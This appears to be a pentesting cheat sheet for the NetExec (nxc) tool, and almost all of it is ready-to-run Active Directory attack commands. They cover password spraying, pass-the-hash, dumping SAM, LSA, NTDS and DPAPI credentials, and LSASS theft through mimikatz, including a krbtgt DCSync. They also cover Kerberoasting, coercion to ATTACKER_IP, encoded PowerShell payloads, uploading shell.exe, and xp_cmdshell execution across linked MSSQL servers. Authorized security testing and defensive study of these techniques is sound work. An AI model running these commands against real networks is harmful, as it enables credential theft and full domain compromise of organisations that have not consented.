NetExec (nxc)
aka nxc, CrackMapExec, cme, netexec
NetExec (nxc) — active successor to CrackMapExec: SMB/LDAP/WinRM/MSSQL multi-protocol Swiss army knife for AD pentesting. Password spraying, credential dumping, Kerberoasting, BloodHound collection, LAPS, coercion checks, and 50+ modules. All payloads verified against netexec.wiki.
Ports
| Port | Proto | Notes |
|---|---|---|
445 | tcp | SMB |
389 | tcp | LDAP |
5985 | tcp | WinRM HTTP |
1433 | tcp | MSSQL |
Fingerprint
- nxc smb 192.168.1.0/24 — sweep and fingerprint an entire subnet
- [+] = login success (Pwn3d!) = local admin / code execution available
Key files
| Path | Holds | Sensitive |
|---|---|---|
~/.nxc/ | credential database, session logs, dumped hashes | sensitive |
Exploitation primitives
- Subnet sweep identifies live hosts, OS versions, SMB signing status
- --continue-on-success keeps spraying after first hit; --no-bruteforce pairs user[n]+pass[n]
- SMB --sam/--lsa/--ntds/--dpapi dump credentials from local to domain-wide
- LDAP --kerberoasting / --asreproast pipe directly to hashcat
- --gen-relay-list outputs hosts with SMB signing disabled for ntlmrelayx
Install
pip3 install netexec # or pipx install netexec
nxc --version
# Update
pip3 install --upgrade netexecTarget Formats
nxc smb 192.168.1.10
nxc smb 192.168.1.0/24
nxc smb 192.168.1.0-28 10.0.0.1-67
nxc smb ~/targets.txt
nxc smb 192.168.1.0/24 192.168.2.5SMB Protocol
Host Discovery & Fingerprint
nxc smb 192.168.1.0/24Output shows: hostname, IP, domain, OS version, SMB signing (signing:True/False).
Authentication Testing
# Domain credentials
nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE'
nxc smb 192.168.1.0/24 -u UserNAme -H 'NTHASH'
nxc smb 192.168.1.0/24 -u UserNAme -H 'LM:NT'
nxc smb 192.168.1.0/24 -u Administrator -H '13b29964cc2480b4ef454c59562e675c'
# Local credentials
nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-auth
nxc smb 192.168.1.0/24 -u localguy -H 'NTHASH' --local-auth
# Kerberos (use -k or --use-kcache)
nxc smb dc.domain.local -u user -p pass -k
export KRB5CCNAME=ticket.ccache && nxc smb dc.domain.local --use-kcache
# NULL / anonymous session
nxc smb 10.10.10.161 -u '' -p ''
# Guest logon (empty password only)
nxc smb 10.10.10.178 -u 'a' -p ''[+] = login success, (Pwn3d!) = local admin / execution available.
Password Spraying
# One password → all users
nxc smb 192.168.1.101 -u /path/to/users.txt -p 'Summer18'
nxc smb 192.168.1.101 -u /path/to/users.txt -p 'Summer18' --continue-on-success
# Multiple users inline
nxc smb 192.168.1.101 -u user1 user2 user3 -p Summer18
# Multiple passwords → one user
nxc smb 192.168.1.101 -u Administrator -p /path/to/passwords.txt
# Pair user[n] with pass[n] (no cross-product brute force)
nxc smb 192.168.1.101 -u user.txt -p pass.txt --no-bruteforce --continue-on-successEnumeration
# Shares
nxc smb 192.168.1.0/24 -u user -p 'PASSWORDHERE' --shares
nxc smb 192.168.1.0/24 -u user -p 'PASSWORDHERE' --shares READ
nxc smb 192.168.1.0/24 -u user -p 'PASSWORDHERE' --shares WRITE
# Users (domain)
nxc smb 192.168.1.0/24 -u user -p 'PASSWORDHERE' --users
# Local groups
nxc smb 192.168.1.0/24 -u user -p 'PASSWORDHERE' --local-group
# RID brute-force (enumerate local/domain accounts)
nxc smb 192.168.1.0/24 -u user -p 'PASSWORDHERE' --rid-brute
# Password policy
nxc smb 192.168.1.0/24 -u user -p 'PASSWORDHERE' --pass-pol
# NULL session password policy
nxc smb DC_IP -u '' -p '' --pass-pol
nxc smb DC_IP -u '' -p '' --users
nxc smb DC_IP -u '' -p '' --shares
# Logged-on users (registry profiles)
nxc smb 192.168.1.0/24 -u user -p 'PASSWORDHERE' --loggedon-users
# Active interactive sessions (needed for schtask_as impersonation)
nxc smb 192.168.1.0/24 -u user -p 'PASSWORDHERE' --qwinsta
# Loaded registry profiles
nxc smb 192.168.1.0/24 -u user -p 'PASSWORDHERE' --reg-sessions
# Disks
nxc smb 192.168.1.0/24 -u user -p 'PASSWORDHERE' --disks
# Running processes (tasklist)
nxc smb 192.168.1.0/24 -u user -p 'PASSWORDHERE' --tasklist
nxc smb 192.168.1.0/24 -u user -p 'PASSWORDHERE' --tasklist keepass.exe
# AV/EDR detection (no admin needed)
nxc smb TARGET -u user -p pass -M enum_av
# NTLMv1 check (requires local admin)
nxc smb TARGET -u user -p pass -M ntlmv1
# BitLocker status
nxc smb TARGET -u user -p pass -M bitlocker
# Generate NTLM relay target list (SMB signing disabled)
nxc smb 192.168.1.0/24 --gen-relay-list relay_list.txtSpider Shares
# List all files across all readable shares
nxc smb 10.10.10.10 -u user -p pass -M spider_plus
# Download all readable files
nxc smb 10.10.10.10 -u user -p pass -M spider_plus -o DOWNLOAD_FLAG=True
# Spider a specific share with a file pattern
nxc smb TARGET -u user -p pass --spider C\$ --pattern txtCommand Execution
# Auto-selects wmiexec → atexec → smbexec
nxc smb TARGET -u user -p pass -x whoami
# Force execution method
nxc smb TARGET -u user -p pass -x whoami --exec-method wmiexec
nxc smb TARGET -u user -p pass -x whoami --exec-method smbexec
nxc smb TARGET -u user -p pass -x whoami --exec-method atexecCredential Dumping
# SAM (local account hashes) — requires local admin
nxc smb 192.168.1.0/24 -u user -p pass --sam
# LSA secrets (service creds, cached hashes) — requires local admin
nxc smb 192.168.1.0/24 -u user -p pass --lsa
# NTDS.dit (all domain hashes) — requires DA or local admin on DC
nxc smb DC_IP -u user -p pass --ntds
nxc smb DC_IP -u user -p pass --ntds --enabled # enabled accounts only
nxc smb DC_IP -u user -p pass --ntds vss # via Volume Shadow Copy
nxc smb DC_IP -u user -p pass --ntds --user Administrator # single user
# LSASS — via modules
nxc smb TARGET -u admin -p pass -M lsassy
nxc smb TARGET -u admin -p pass -M nanodump
nxc smb TARGET -u admin -p pass -M mimikatz
nxc smb TARGET -u admin -p pass -M mimikatz -o COMMAND='"lsadump::dcsync /domain:domain.local /user:krbtgt"'
# DPAPI (Credential Manager, browsers)
nxc smb TARGET -u user -p pass --dpapi
nxc smb TARGET -u user -p pass --dpapi cookies # browser cookies
nxc smb TARGET -u user -p pass --dpapi nosystem # skip system creds (stealthier)
# SCCM NAA credentials
nxc smb DC_IP -u user -p pass --sccm
nxc smb DC_IP -u user -p pass --sccm disk
nxc smb DC_IP -u user -p pass --sccm wmi
# LAPS — read managed local admin password
nxc smb TARGET -u laps-reader -p pass --laps
nxc smb TARGET -u laps-reader -p pass --laps custom_admin_name # non-default admin
# Third-party app credentials
nxc smb TARGET -u user -p pass -M veeam
nxc smb TARGET -u user -p pass -M winscp
nxc smb TARGET -u user -p pass -M putty
nxc smb TARGET -u user -p pass -M mremoteng
nxc smb TARGET -u user -p pass -M vnc
nxc smb TARGET -u user -p pass -M wifi
# M365 / Azure token broker cache (WAM)
nxc smb TARGET -u user -p pass -M wamGPP / SYSVOL
nxc smb DC_IP -u user -p pass -M gpp_password
nxc smb DC_IP -u user -p pass -M gpp_autologinVulnerability Checks
nxc smb TARGET -u '' -p '' -M zerologon
nxc smb TARGET -u user -p pass -M nopac # requires valid creds
nxc smb TARGET -u '' -p '' -M printnightmare
nxc smb TARGET -u '' -p '' -M smbghost
nxc smb TARGET -u '' -p '' -M ms17-010
nxc smb TARGET -u user -p pass -M ntlm_reflection # requires creds
# Coercion vectors check (PrinterBug, PetitPotam, DFSCoerce, etc.)
nxc smb TARGET -u '' -p '' -M coerce_plus
nxc smb TARGET -u '' -p '' -M coerce_plus -o LISTENER=ATTACKER_IP
nxc smb TARGET -u '' -p '' -M coerce_plus -o LISTENER=ATTACKER_IP ALWAYS=true
nxc smb TARGET -u '' -p '' -M coerce_plus -o METHOD=PetitPotamLDAP Protocol
Authentication
nxc ldap 192.168.1.0/24 -u user -p password
nxc ldap 192.168.1.0/24 -u user -H NTHASH
nxc ldap dc.domain.local -u user -p pass -k --kdcHost dc.domain.local # Kerberos
nxc ldap 192.168.1.0/24 -u users.txt -p '' -k # AS-REQ enumAdd --no-smb to skip the SMB domain-resolution step (when port 445 is filtered).
User / Group Enumeration
# Domain users (via SMB with LDAP backend)
nxc smb DC_IP -u user -p pass --users
# Domain groups — use LDAP protocol
nxc ldap DC_IP -u user -p pass --groups
# Computers
nxc ldap DC_IP -u user -p pass --computers
# Admin count (accounts that were/are privileged)
nxc ldap DC_IP -u user -p pass --admin-count
# Raw LDAP query
nxc ldap DC_IP -u user -p pass --query "(sAMAccountName=Administrator)" ""
nxc ldap DC_IP -u user -p pass --query "(adminCount=1)" "sAMAccountName"
# Passwords stored in user description field
nxc ldap DC_IP -u user -p pass -M get-desc-users
# Domain SID
nxc ldap DC_IP -u user -p pass -k --get-sid
# Domain controllers list
nxc ldap DC_IP -u user -p pass --dc-listKerberos Attacks
# AS-REP Roasting (DONT_REQ_PREAUTH accounts)
nxc ldap DC_IP -u user -p pass --asreproast asrep.txt
nxc ldap DC_IP -u users.txt -p '' --asreproast asrep.txt # with username list, no password
# Crack: hashcat -m 18200 asrep.txt wordlist.txt
# Kerberoasting (accounts with SPNs)
nxc ldap DC_IP -u user -p pass --kerberoasting tgs.txt
nxc ldap DC_IP -u user -p pass --kerberoasting tgs.txt --targeted-kerberoast victim1 victim2
nxc ldap DC_IP -u user -p pass --kerberoasting tgs.txt --targeted-kerberoast users.list
# Crack: hashcat -m 13100 tgs.txt wordlist.txt
# No-preauth Kerberoasting (ASREP + Kerberoast combined)
nxc ldap DC_IP -u user -p '' --no-preauth-targets kerberoastable.list --kerberoasting output.txtDelegation
# All delegation types
nxc ldap DC_IP -u user -p pass --find-delegation
# Unconstrained delegation only
nxc ldap DC_IP -u user -p pass --trusted-for-delegationDomain Recon
# Fine-grained password policies (PSOs)
nxc ldap DC_IP -u user -p pass --pso
# Machine Account Quota (for RBCD / computer account creation)
nxc ldap DC_IP -u user -p pass -M maq
# LDAP signing / channel binding check
nxc ldap DC_IP -u user -p pass -M ldap-checker
# Extract subnets
nxc ldap DC_IP -u user -p pass -M get-network
nxc ldap DC_IP -u user -p pass -M get-network -o ONLY_HOSTS=true
# Pre-created computer account abuse
nxc ldap DC_IP -u user -p pass -M pre2k
# gMSA passwords
nxc ldap DC_IP -u user -p pass --gmsa
# ADCS — find certificate services
nxc ldap DC_IP -u user -p pass -M adcsBloodHound Collection
nxc ldap DC_IP -u user -p pass --bloodhound --collection All
nxc ldap DC_IP -u user -p pass --bloodhound --collection DCOnly
nxc ldap DC_IP -u user -p pass --bloodhound --collection Session,TrustsWinRM Protocol
# Test authentication
nxc winrm 192.168.1.0/24 -u user -p password
nxc winrm 192.168.1.0/24 -u user -p password -d DOMAIN # when SMB unavailable
# Password spray
nxc winrm 192.168.1.0/24 -u users.txt -p passwords.txt --no-bruteforce --continue-on-success
# Execute PowerShell command (capital -X for WinRM)
nxc winrm TARGET -u user -p pass -X whoami
nxc winrm TARGET -u user -p pass -X 'Get-Process | Select-Object -First 5'
# Credential dumping
nxc winrm TARGET -u user -p pass --sam
nxc winrm TARGET -u user -p pass --lsa
nxc winrm TARGET -u user -p pass --dpapi # dumps Credential Manager (no admin needed)Note: WinRM uses
-Xfor PowerShell commands. SMB uses-xfor cmd.exe commands. Capital matters.
MSSQL Protocol
Authentication & Discovery
# Subnet sweep (shows EncryptionReq flag)
nxc mssql 192.168.1.0/24
# Windows auth (default)
nxc mssql 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!'
nxc mssql 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!' -d HTB
# SQL local auth
nxc mssql 10.10.10.52 -u sa -p 'password' --local-auth
# Non-default port
nxc mssql 10.10.10.52 -u admin -p pass --port 1434Query and Execute
# SQL query
nxc mssql TARGET -u sa -p pass --local-auth -q 'SELECT name FROM master.dbo.sysdatabases;'
# OS command via xp_cmdshell (auto-enables if disabled)
nxc mssql TARGET -u sa -p pass --local-auth -x whoami
nxc mssql TARGET -u sa -p pass --local-auth -x 'powershell -enc BASE64_PAYLOAD'
# File upload / download
nxc mssql TARGET -u admin -p pass --put-file /tmp/shell.exe 'C:\Windows\Temp\shell.exe'
nxc mssql TARGET -u admin -p pass --get-file 'C:\Windows\Temp\output.txt' /tmp/output.txtPrivilege Escalation & Linked Servers
# Check impersonation privileges
nxc mssql TARGET -u user -p pass -M mssql_priv
# Escalate via impersonation
nxc mssql TARGET -u user -p pass -M mssql_priv -o ACTION=privesc
# Rollback privileges after escalation
nxc mssql TARGET -u user -p pass -M mssql_priv -o ACTION=rollback
# Enumerate linked servers
nxc mssql TARGET -u user -p pass -M enum_links
# Execute query on linked server
nxc mssql TARGET -u user -p pass -M exec_on_link -o LINKED_SERVER=SERVER2 COMMAND='select @@servername'
# Enable xp_cmdshell on linked server
nxc mssql TARGET -u user -p pass -M link_enable_cmdshell -o LINKED_SERVER=SERVER2 ACTION=enable
# Run OS command via linked server
nxc mssql TARGET -u user -p pass -M link_xpcmd -o LINKED_SERVER=SERVER2 CMD='whoami'
# Disable after use
nxc mssql TARGET -u user -p pass -M link_enable_cmdshell -o LINKED_SERVER=SERVER2 ACTION=disableModule Usage Reference
# List all modules for a protocol
nxc smb -L
nxc ldap -L
nxc mssql -L
# Module help / options
nxc smb -M lsassy --options
# Pass options to a module
nxc smb TARGET -u admin -p pass -M mimikatz -o COMMAND='"sekurlsa::logonpasswords"'
# Run multiple modules in one command
nxc smb TARGET -u admin -p pass -M spooler -M lsassy -M winscpCommon Flag Quick-Reference
| Flag | Protocol | Effect |
|---|---|---|
--local-auth | SMB/MSSQL | Authenticate against local SAM (not domain) |
--continue-on-success | all | Don’t stop after first valid credential |
--no-bruteforce | all | Pair user[n]+pass[n], no cross-product |
-k | all | Use Kerberos auth |
--use-kcache | all | Use ticket from KRB5CCNAME |
--exec-method | SMB | wmiexec, smbexec, atexec |
-x | SMB | Run cmd.exe command |
-X | WinRM | Run PowerShell command |
-q | MSSQL | Execute SQL query |
--ntds vss | SMB | Dump NTDS via Volume Shadow Copy |
--dpapi nosystem | SMB | Skip SYSTEM credentials |
--laps [name] | SMB | Read LAPS-managed password |
--gmsa | LDAP | Read gMSA password |
--bloodhound --collection All | LDAP | Full BloodHound ingest |
--gen-relay-list | SMB | Output hosts without SMB signing |
--find-delegation | LDAP | All delegation types |
--asreproast | LDAP | AS-REP roast to file |
--kerberoasting | LDAP | Kerberoast to file |
--pso | LDAP | Fine-grained password policies |